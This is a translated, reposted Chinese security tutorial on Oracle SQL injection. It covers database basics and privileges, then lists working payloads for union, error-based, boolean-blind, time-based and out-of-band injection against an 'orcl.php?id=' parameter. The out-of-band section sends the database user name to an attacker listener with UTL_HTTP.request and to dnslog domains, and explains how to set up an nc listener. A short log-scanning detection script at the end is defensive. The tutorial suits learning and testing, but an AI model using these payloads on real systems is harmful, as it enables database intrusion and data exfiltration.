
Oracle SQL injection summary

0x00 Oracle Basics

Basic use of Oracle

What is the Oracle database?

  • Oracle Corporation is currently one of the largest software vendors in the world, alongside Microsoft and Adobe. As Oracle has grown, it has become one of the largest providers of enterprise office platforms.

  • Oracle Database is the core product of Oracle Corporation (Chinese name: 甲骨文). It is a database management system suited to large and medium-sized enterprises. Among database management systems (such as Microsoft SQL Server and IBM's DB2), Oracle's users cover a particularly wide range, including banking, telecoms, mobile communications, aviation, insurance, finance, e-commerce and multinational corporations. The Oracle product itself is free and the installer can be downloaded from Oracle's official website; Oracle's services, on the other hand, are charged.

  • Website: https://www.oracle.com/cn/index.html

Characteristics of the Oracle database

  • Complete data management functions

    • Large data volumes

    • Preservation and persistence of data

    • Data sharing

  • A complete relational product

    • Information rule: a relational DBMS represents all information logically in exactly one way, namely as values in tables

    • Guaranteed access rule

    • View update rule: whenever the data in the tables underlying a view changes, the data in the corresponding view changes at the same time

  • Distributed processing functions

    • An Oracle distributed database consists of Oracle RDBMS, SQL*Net, SQL*Connect and other non-Oracle relational products

Advantages and disadvantages of Oracle compared with other databases

  • Advantages

    • Openness: Oracle runs on all mainstream platforms (including Windows), fully supports all industry standards, follows a completely open strategy so that customers can choose the solution that suits them, and fully supports developers

    • Parallelism: Oracle Parallel Server extends the capabilities of Windows NT by letting a group of nodes share the work of the same cluster, providing a cluster solution with high availability and high scalability

    • Security: has obtained the highest level of ISO standard certification

    • Performance: Oracle holds the TPC-D and TPC-C world records on open platforms

    • Usage risk: Oracle's long development history, full compatibility and wide deployment make it low-risk to adopt

  • Disadvantages

    • High hardware requirements

    • Expensive

    • Management and maintenance are troublesome

    • Operation is relatively complex and requires a high level of skill

Common Oracle data types

Logging in to the Oracle database

Basic table management statements in Oracle

```sql
-- Create a table: create table <table_name>(<column_name> <type> <constraint>)
create table ichunqiu(name char(10) primary key, age int);

-- Add a column: alter table <table_name> add(<column_name> <data_type>)
alter table ichunqiu add(class_name varchar2(200));

-- Delete a column (mark it unused): alter table <table_name> set unused column <column_name>
alter table ichunqiu set unused column name;

-- Modify a column: alter table <table_name> modify(<column_name> <new_type>)
alter table ichunqiu modify(name varchar(200));
```

**Basic data manipulation statements in Oracle**

**Query**
```sql
-- select *|<column_name>|<expression> from <table_name> where <condition> order by <column_name>
select * from ichunqiu order by age desc;  -- descending
select * from ichunqiu order by age asc;   -- ascending
select * from ichunqiu order by age;       -- ascending by default
```

**Insert**
```sql
-- insert into <table_name> values(<values for all columns>)
-- insert into <table_name>(<column1>, <column2>, <column3>, ...) values(<corresponding values>)
insert into ichunqiu(name, age) values('icq', 18);
insert into ichunqiu values('icq', 18, 'web');
```

**Update**
```sql
-- update <table_name> set <column_name> = <value> where <condition>
update ichunqiu set age=25 where name='icq';
```

**Delete**
```sql
-- delete <table_name> where <condition>
delete ichunqiu where name='ii';
```

  • Truncate

    • Syntax: truncate table <table_name>

    • Explanation: deletes all the data in the table in one go

  • Differences between truncate and delete

    1. truncate is a DDL command and the deleted data cannot be recovered; delete is a DML command and the deleted data can be recovered through the database's log files

    2. If a table has many records, truncate is faster than delete

Oracle access control

Overview of Oracle privileges

  • Privileges allow a user to access objects belonging to other users or to execute programs. Oracle provides three kinds of privileges: object level, system level and role level. These privileges can be granted to users, to the special user PUBLIC, or to roles. Granting a privilege to the special user PUBLIC (PUBLIC is predefined by Oracle, and every user has the rights this user has) grants it to all users of the database.

  • For privilege management, a role is a tool: a privilege can be granted to a role, and a role can in turn be granted to another role or to a user. Users inherit privileges through roles; roles serve no purpose other than privilege management. Privileges that have been granted can be revoked in the same way.

Classification of privileges

  • There are two types of privileges in the Oracle database:

    1. System privileges: the rights the system grants a user to use the database (system privileges apply to users)

    2. Entity privileges: a user's access rights to other users' tables or views (they apply to a table or view)

System privileges (user privilege management)

  • Classification of system privileges

    • DBA: has all privileges; it is the highest authority in the system, and only a DBA can create the database structure

    • RESOURCE: a user with the Resource privilege can only create entities and cannot create the database structure

    • CONNECT: a user with the Connect privilege can only log in to Oracle; it cannot create entities or the database structure

  • Ordinary users are granted the connect and resource privileges

  • DBA management users are granted the connect, resource and dba privileges

System privilege grant commands

  • System privileges can only be granted by DBA users, i.e. sys and system (initially only these two users exist):

```sql
SQL> grant connect,resource,dba to <user1>[,<user2>]...;

SQL> create user user50 identified by user50;
SQL> grant connect,resource to user50;
```

Note: an ordinary user can be granted the same privileges as the system user, but not the same privileges as the sys user; the system user's privileges can also be revoked.

Entity privileges (table privilege management)

  • Classification of entity privileges

    • select, update, insert, alter, index, delete, all  -- all includes all of the privileges

    • execute  -- privilege to execute a stored procedure

  • Examples:

```sql
grant select, insert, update on tablename to userA;            -- grant privileges to the user userA
grant select, insert, update on tablename to public;           -- grant privileges to all users
grant select, update on product to userA with grant option;    -- userA receives the privileges and may pass them on
revoke select, insert, update on tablename from userA;         -- revoke the granted privileges from the user userA
revoke select, insert, update on tablename from public;        -- revoke the granted privileges from all users
```

Note: if an object privilege is revoked from a user, it is also removed from every user to whom that user granted it using WITH GRANT OPTION; in other words, the revocation cascades.

0x01 Common injection types

Prerequisite knowledge

  • The dual table in Oracle

    • This table is one of the tables built into the Oracle database; it exists to satisfy the requirements of query syntax

    • Features of the dual table

      1. dual is a pseudo table in Oracle (it has only one row and one column)

      2. Every user can use it

      3. It may have been deleted; sys can restore it

    • In Oracle a query statement must always name a table, for example:

      • MySQL: union select 1, 2, 3

      • Oracle: union select 1, 2, 3 from dual

  • Comments in Oracle

    • The single-line comment symbol is: --

    • The multi-line comment symbols are: /* */

  • Oracle's strict type matching

    • When performing a UNION query in Oracle, the data type at each position must match the data type of the corresponding column in the table; null can be used in positions where the data type cannot be guessed quickly

    • Example:

      • MySQL: union select 1, 2, 3

      • Oracle: union select null, null, null from dual

union joint query injection

Basic process of Oracle union query injection

**1. Determine whether injection exists**
```
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1'
```

**2. Determine the number of columns**
The current table has 4 columns:
```
id=1 order by 4--
```

**3. Use the union query to find the displayed positions**
Oracle queries need `from dual` (a virtual/pseudo table provided specifically for query statements):
```
union select * from dual--
id=1 union select 1,2,3,4 from dual--
```
null matches every type:
```
id=1 union select null,null,null,null from dual--
id=1 union select 1,'admin',3,4 from dual--
```

**4. Query the database version, the connected database user and the current instance name**
```
id=1 union select 1,(select banner from sys.v_$version where rownum=1),3,4 from dual--
id=1 union select 1,(select SYS_CONTEXT('USERENV','CURRENT_USER') from dual),3,4 from dual-- #test
id=-1 union select 1,(select instance_name from v$instance),3,4 from dual--
```

**5. Enumerate database (owner) names**
```
id=-1 union select 1,(select owner from all_tables where rownum=1),3,4 from DUAL--
id=-1 union select 1,(select owner from all_tables where rownum=1 and owner not in ('SYS')),3,4 from DUAL--
id=-1 union select 1,(select owner from all_tables where rownum=1 and owner not in('SYS','OUTLN','SYSTEM')),3,4 from DUAL--
```

**6. Enumerate table names**
```
id=-1 union select 1,(select table_name from user_tables where rownum=1 and table_name not in ('ADMIN1','DEMO','FLAG','ICHUNQIU','STU')),3,4 from DUAL--
```

**7. Enumerate the column names of the flag table**
```
id=-1 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name='FLAG' AND column_name not in ('id','name','pwd','flag')),3,4 from DUAL--
```

**8. Query column data from the table**
```
id=-1 union select 1,(select NAME||AGE FROM DEMO where rownum=1),3,4 from dual--
id=-1 union select 1,(select "name"||"age" FROM DEMO where rownum=1),3,4 from dual--
id=-1 union select 1,(select 'username:'||NAME||'age:'||AGE FROM DEMO where rownum=1),3,4 from dual--
```

Error-based injection

Common error-reporting functions

  1. dbms_xdb_version.checkin() function

    • The checkin function in the dbms_xdb_version package. It checks in a checked-out VCR (version-controlled resource) and returns the resource ID of the newly created version.

    • payload:
```
and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null--
```

  2. dbms_xdb_version.uncheckout() function

    • Used in the same way as checkin

    • payload:
```
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null--
```

  3. **utl_inaddr.get_host_name()** function

    • Explanation: in Oracle 8i, 9i and 10g this method requires no privileges, but in **Oracle 11g and later** Oracle strengthened access control, so to use this method for error-based injection on 11g and later the current database user must have network access privileges

    • How the error is produced: the function resolves a host name to an IP address; if its argument cannot be resolved it raises an error that displays the argument passed in. If the argument is a SQL statement, the error message therefore shows that statement's result.

    • payload:
```
and utl_inaddr.get_host_name((select user from dual))=1--
```

Other commonly used error-reporting functions

| Function name | payload |
|---|---|
| dbms_xdb_version.makeversioned() | and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null-- |
| dbms_utility.sqlid_to_sqlhash() | and (select dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null-- |
| ordsys.ord_dicom.getmappingxpath() | and (select ordsys.ord_dicom.getmappingxpath((select user from dual),user,user) from dual)=1-- |
| ctxsys.drithsx.sn() | and (select ctxsys.drithsx.sn((select user from dual)) from dual)=1-- |

Basic process of Oracle error-based injection

**1. Determine whether injection exists**
```
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1'
```

**2. Query the database version, the connected database user and the current instance name**
```
id=1 and dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select SYS_CONTEXT('USERENV','CURRENT_USER') from dual)) is not null--
id=1 and dbms_xdb_version.checkin((select instance_name from v$instance)) is not null--
```

**3. Enumerate database (owner) names**
```
id=1 and dbms_xdb_version.checkin((select owner from all_tables where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select owner from all_tables where rownum=1 and owner not in ('SYS'))) is not null--
```

**4. Enumerate table names**
```
id=1 and dbms_xdb_version.checkin((select table_name from user_tables where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select table_name from user_tables where rownum=1 and table_name not in ('ADMIN1','DEMO'))) is not null--
```

**5. Enumerate column names**
```
id=1 and dbms_xdb_version.checkin((select column_name from user_tab_columns where rownum=1 and table_name='FLAG' AND column_name not in ('id','name','pwd','flag'))) is not null--
```

**6. Query column data from the table**
```
id=1 and dbms_xdb_version.checkin((select NAME||AGE FROM DEMO where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select "name"||"age" FROM DEMO where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select 'username:'||NAME||'age:'||AGE FROM DEMO where rownum=1)) is not null--
```

Boolean-based blind injection

Functions used in boolean-based blind injection

  1. decode() function

    • Usage: decode(expression, value1, result1, value2, result2, ..., valueN, resultN, default)

    • Meaning: if (expression == value1) return result1, and so on; otherwise return default

    • Example: query the Oracle version and judge whether the first character of the version string is O

    • Payload:
```
and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual)--
```

    • Note: the inner select statement can be replaced, for example:

      • Get the current user: select user from dual;

      • Get the length of a string: select length(user) from dual;

  2. instr() function

    • Usage: instr(string1, string2) / instr(source string, target string)

    • Meaning: searches for the specified string and returns the position at which it is found; string1 is the string being searched, string2 is the string to search for

    • Injection idea: instr returns the position of the target string within the query result, or 0 if it is not found, so the data can be recovered by iterating over the position of the target string

    • Example: query the current user and judge whether the first character of the user name is T

    • Payload:
```
and 1=(instr((select user from dual),'T'))--
```

Basic process of Oracle boolean-based blind injection

**1. Determine whether injection exists**
```
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1'
```

**2. Query the database version / user**
Helper functions:
```
decode   decode(substr(('abc'),1,1),'a',1,0)
length   returns the length of a string
ascii    returns the ASCII code of a character
instr    whether the search result contains the keyword; returns its position (1 for a prefix match), otherwise 0
```
```
id=1 and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual)--
id=1 and (select length(user) from dual)=4--
id=1 and (select ascii('a') from dual)=97--
id=1 and (select ascii(substr((select user from dual),1,1)) from dual)=84-- #ASCII 84 is the character T
id=1 and (select ascii(substr((select user from dual),2,1)) from dual)=69-- #ASCII 69 is the character E

id=1 and 1=(instr((select user from dual),'T'))--
id=1 and 1=(instr((select user from dual),'TE'))--
id=1 and 1=(instr((select user from dual),'TES'))--
id=1 and 1=(instr((select user from dual),'TEST'))--
```

**3. Get the database (owner) name**
```
id=1 and (select length(owner) from all_tables where rownum=1)=3-- #the first owner name has length 3
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),1,1)) from dual)=83-- #ASCII 83 is S
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),2,1)) from dual)=89-- #ASCII 89 is Y
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),3,1)) from dual)=83-- #ASCII 83 is S
```

**4. Get table names**
```
id=1 and (select ascii(substr((select table_name from user_tables where rownum=1),1,1)) from dual)=105-- #the first character of the first table name is i
id=1 and (select ascii(substr((select table_name from user_tables where rownum=1),2,1)) from dual)=99-- #the second character of the first table name is c
```

**5. Get column names**
```
id=1 and (select ascii(substr((select column_name from user_tab_columns where rownum=1 and table_name='icq'),1,1)) from dual)=117-- #the first character of the first column in the icq table is u
id=1 and (select ascii(substr((select column_name from user_tab_columns where rownum=1 and table_name='icq'),2,1)) from dual)=115-- #the second character of the first column in the icq table is s
```

Time-based blind injection

Functions used in time-based blind injection

  • DBMS_PIPE.RECEIVE_MESSAGE() function

    • Usage: DBMS_PIPE.RECEIVE_MESSAGE('<any value>', <delay in seconds>)

    • Example: DBMS_PIPE.RECEIVE_MESSAGE('ICQ',5) waits 5 seconds for data returned from the ICQ pipe

    • payload:
```
and DBMS_PIPE.RECEIVE_MESSAGE('ICQ',5)=1
```

Commonly used payloads

```
id=1 and dbms_pipe.receive_message((), 5)=1
id=1 and (select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O', dbms_pipe.receive_message('ICQ', 5),0) from dual)=1--
```
If the first character of the database version is O, the response is delayed by 5 s.
```
id=1 and (select decode(length(user),4,dbms_pipe.receive_message('ICQ', 5),0) from dual)=1--
```
If the user name has length 4, the response is delayed by 5 s.

Out-of-band injection

Oracle out-of-band injection

  • Oracle out-of-band injection is very similar to DNSLOG: it relies on functions that make network requests to carry out the injection. The functions that can make network requests are as follows.

Functions used in out-of-band injection

  • utl_http.request() function

    • Function description: Oracle provides the utl_http.request function for retrieving information from a web server; an attacker can therefore listen on a port and have the required data sent to it in a request issued through this function

    • UTL_HTTP package: provides operations for HTTP

    • Example: executing this SQL statement returns the HTML source of baidu.com
```sql
select UTL_HTTP.REQUEST('http://www.baidu.com') from dual
```

  • utl_inaddr.get_host_address() function

    • Commonly used payload (replace aaa.com with your own dnslog domain):
```
and (select utl_inaddr.get_host_address((select user from dual)||'.aaa.com') from dual) is not null --
```

  • SYS.DBMS_LDAP.INIT()

    • Commonly used payload (replace aaaa.com with your own dnslog domain):
```
and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.aaaa.com') from dual) is not null --
```

Out-of-band injection process

  1. Determine whether the UTL_HTTP stored procedure is available

    • Submit the following query at the injection point:
```sql
select count(*) from all_objects where object_name='UTL_HTTP'
```
    • Judge from the page response whether UTL_HTTP is available: if the page returns normally, the UTL_HTTP stored procedure is available

  2. Use nc to listen for the data

    • Listen on a port locally with nc; the local host needs a public IP address

    • nc -lvvp <listening port>

  3. Send the data back to the listener

    • Submit at the injection point:
```
# send a request carrying the current user name
id=1 and UTL_HTTP.request('http://<ip>:<listening port>/'||(select user from dual))=1--
```

This completes the injection.

Note: each time a request is submitted at the injection point, nc disconnects after receiving it, so the nc listener has to be restarted.

Commonly used payloads

```
# check whether utl_http is available
id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP')--
id=1 and (select count(*) from all_objects where object_name='UTL_HTTP')>1--
id=1 union select 1,null,3,(select count(*) from all_objects where object_name='UTL_HTTP') from dual--

# send a request carrying the current user name
id=1 and UTL_HTTP.request('http://<ip>:<listening port>/'||(select user from dual))=1--
```
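As an added defender-side example (not code from the original post), the following Python script classifies web-server access-log lines by the Oracle injection family they match, using the function and view names that appear in the union, error-based, boolean, time-based and out-of-band payloads above; it also decodes one level of double URL encoding before matching. The log lines, the `listener.example` host and the combined log layout are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# (family, regex) pairs. The function and view names are the ones used in
# the payloads of this page, grouped by the injection technique they serve.
SIGNATURES = [
    ("union",   r"union\s+(all\s+)?select\b.*\bfrom\s+dual\b"),
    ("error",   r"dbms_xdb_version\.(checkin|uncheckout|makeversioned)\s*\("),
    ("error",   r"utl_inaddr\.get_host_name\s*\("),
    ("error",   r"(dbms_utility\.sqlid_to_sqlhash|ordsys\.ord_dicom\.getmappingxpath|ctxsys\.drithsx\.sn)\s*\("),
    ("boolean", r"\b(decode|ascii)\s*\(\s*substr\s*\("),
    ("boolean", r"\binstr\s*\(\s*\(\s*select\b"),
    ("time",    r"dbms_pipe\.receive_message\s*\("),
    ("oob",     r"(utl_http\.request|utl_inaddr\.get_host_address|dbms_ldap\.init)\s*\("),
    ("recon",   r"\b(sys\.v_\$version|v\$instance|all_tables|user_tables|user_tab_columns|all_objects)\b"),
]

# Apache/nginx combined log format: client, identity, user, [time], "request".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def normalise(raw: str) -> str:
    """Undo up to two levels of URL encoding, collapse whitespace, lowercase."""
    text = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", text).lower()


def classify(target: str) -> list:
    """Return the injection families whose signatures match a request target."""
    text = normalise(target)
    found = []
    for family, pattern in SIGNATURES:
        if family not in found and re.search(pattern, text):
            found.append(family)
    return found


def scan_log(lines) -> list:
    """Return (client ip, request target, families) for every suspicious line."""
    alerts = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        families = classify(match.group("target"))
        if families:
            alerts.append((match.group("ip"), match.group("target"), families))
    return alerts


# Constructed sample lines: one benign request followed by one request per
# injection family from this page; listener.example is a placeholder host.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Nov/2021:09:41:45 +0800] "GET /orcl.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [09/Nov/2021:09:41:46 +0800] "GET /orcl.php?id=-1%20union%20select%201,(select%20banner%20from%20sys.v_$version%20where%20rownum=1),3,4%20from%20dual-- HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [09/Nov/2021:09:41:47 +0800] "GET /orcl.php?id=1%20and%20dbms_xdb_version.checkin((select%20user%20from%20dual))%20is%20not%20null-- HTTP/1.1" 500 301 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [09/Nov/2021:09:41:48 +0800] "GET /orcl.php?id=1%20and%20(select%20ascii(substr((select%20user%20from%20dual),1,1))%20from%20dual)=84-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [09/Nov/2021:09:41:49 +0800] "GET /orcl.php?id=1%2520and%2520dbms_pipe.receive_message(%2527ICQ%2527,5)=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [09/Nov/2021:09:41:55 +0800] "GET /orcl.php?id=1%20and%20UTL_HTTP.request(\'http://listener.example:8080/\'||(select%20user%20from%20dual))=1-- HTTP/1.1" 500 301 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, families in scan_log(SAMPLE_LOG):
        print(ip, families, target)
```

Signatures keyed on package and view names survive the operator variations (`rownum`, `not in`, `null` padding) used across the payload lists above, whereas a rule that only looks for `union select` would miss every error-based, blind and out-of-band request.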

Copyright notice
This article was written by [FreeKnight]; when reposting, please include a link to the original. Thank you.
https://cdmana.com/2021/11/20211109094145412T.html
